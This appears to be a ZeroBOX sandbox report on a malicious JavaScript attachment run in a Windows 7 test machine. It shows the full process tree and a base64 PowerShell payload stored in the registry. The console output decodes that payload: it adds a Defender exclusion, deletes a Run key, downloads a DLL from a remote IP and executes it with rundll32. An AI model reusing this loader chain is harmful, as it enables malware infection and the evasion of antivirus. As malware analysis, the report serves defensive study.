Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 7, 2023, 9:57 a.m.	March 7, 2023, 10 a.m.

Size	59.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`4d6f207abc312202cfe05848020bfc91`
SHA256	`59c935746764ee0e2c3e80686e3f4ed7d0bf62d4076c50641b93ac4b7fb3a854`
CRC32	`372FAAAD`
ssdeep	`768:XuXiwwxBzAw7+jX5f3Uq3da4439LSRtO01io+MjgDxUiPFPVLlmlCNortFgqWQfI:XuXiw4K/hN6qAzpIVEGtz8`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Attachment-Cc(731).js
3044
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT
  1632
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
  1324
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
  1392
- reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
  2656
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"
  2820
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
    260
    - rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\overvaultUnheroize.dll RS32
      908

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 7, 2023, 9:58 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 7, 2023, 9:58 a.m.			0	0
IsDebuggerPresent March 7, 2023, 9:58 a.m.			0	0

Command line console output was observed (50 out of 54 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: '6 bytes loaded from System.Management.Automation, Version=1.0.0.0, Culture=ne console_handle: 0x0000002f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: utral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An attempt console_handle: 0x0000003b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:183 console_handle: 0x00000053	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $UnwarpedIronworker = Get-ItemProperty -Path HKCU:\\SOFTWARE\\bromeliaceous \| console_handle: 0x0000005f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: %{$_.Wordcraftsman}; $UnwarpedIronworker = "Ciliella" + $UnwarpedIronworker; [ console_handle: 0x0000006b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Reflection.Assembly]::Load <<<< ([Convert]::fromBase64String($UnwarpedIronworke console_handle: 0x00000077	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: r)); [classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hid console_handle: 0x00000083	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: den ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -Ex console_handle: 0x0000008f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: clusionPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wind console_handle: 0x0000009b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: ows\CurrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\br console_handle: 0x000000a7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: omeliaceous /v Wordcraftsman /f""");Invoke-WebRequest http://134.209.216.163/qI console_handle: 0x000000b3	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: 46n1N/03 -O $env:TEMP\overvaultUnheroize.dll; rundll32 $env:TEMP\\overvaultUnhe console_handle: 0x000000bf	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: roize.dll,RS32; console_handle: 0x000000cb	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000d7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000e3	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Unable to find type [classicyc1]: make sure that the assembly containing this t console_handle: 0x00000103	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: ype is loaded. console_handle: 0x0000010f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:247 console_handle: 0x0000011b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $UnwarpedIronworker = Get-ItemProperty -Path HKCU:\\SOFTWARE\\bromeliaceous \| console_handle: 0x00000127	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: %{$_.Wordcraftsman}; $UnwarpedIronworker = "Ciliella" + $UnwarpedIronworker; [ console_handle: 0x00000133	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Reflection.Assembly]::Load([Convert]::fromBase64String($UnwarpedIronworker)); [ console_handle: 0x0000013f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: classicyc1] <<<< ::Execute("powershell -executionpolicy bypass -windowstyle hid console_handle: 0x0000014b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: den ""`$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -Ex console_handle: 0x00000157	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: clusionPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Wind console_handle: 0x00000163	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: ows\CurrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\br console_handle: 0x0000016f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: omeliaceous /v Wordcraftsman /f""");Invoke-WebRequest http://134.209.216.163/qI console_handle: 0x0000017b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: 46n1N/03 -O $env:TEMP\overvaultUnheroize.dll; rundll32 $env:TEMP\\overvaultUnhe console_handle: 0x00000187	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: roize.dll,RS32; console_handle: 0x00000193	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + CategoryInfo : InvalidOperation: (classicyc1:String) [], Runtim console_handle: 0x0000019f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: eException console_handle: 0x000001ab	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x000001b7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: The term 'Invoke-WebRequest' is not recognized as the name of a cmdlet, functio console_handle: 0x00000023	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: n, script file, or operable program. Check the spelling of the name, or if a pa console_handle: 0x0000002f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: th was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: At line:1 char:599 console_handle: 0x00000047	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: + $UnwarpedIronworker = Get-ItemProperty -Path HKCU:\\SOFTWARE\\bromeliaceous \| console_handle: 0x00000053	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: %{$_.Wordcraftsman}; $UnwarpedIronworker = "Ciliella" + $UnwarpedIronworker; [ console_handle: 0x0000005f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: Reflection.Assembly]::Load([Convert]::fromBase64String($UnwarpedIronworker)); [ console_handle: 0x0000006b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: classicyc1]::Execute("powershell -executionpolicy bypass -windowstyle hidden "" console_handle: 0x00000077	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: `$currentDrive = `(get-location`).Drive.Name + ':\'; Add-MpPreference -Exclusio console_handle: 0x00000083	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: nPath `$currentDrive;reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Cu console_handle: 0x0000008f	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: rrentVersion\Run /v Userinit /f; reg delete HKEY_CURRENT_USER\SOFTWARE\bromelia console_handle: 0x0000009b	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: ceous /v Wordcraftsman /f""");Invoke-WebRequest <<<< http://134.209.216.163/qI console_handle: 0x000000a7	1	1
WriteConsoleW March 7, 2023, 9:58 a.m.	buffer: 46n1N/03 -O $env:TEMP\overvaultUnheroize.dll; rundll32 $env:TEMP\\overvaultUnhe console_handle: 0x000000b3	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 88 events)

Time & API	Arguments	Status	Return
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b16c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1e88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1788 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1988 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1948 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b2088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003b1348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322cd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00323350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 7, 2023, 9:58 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00322e10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 7, 2023, 9:58 a.m.		1	1	0

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
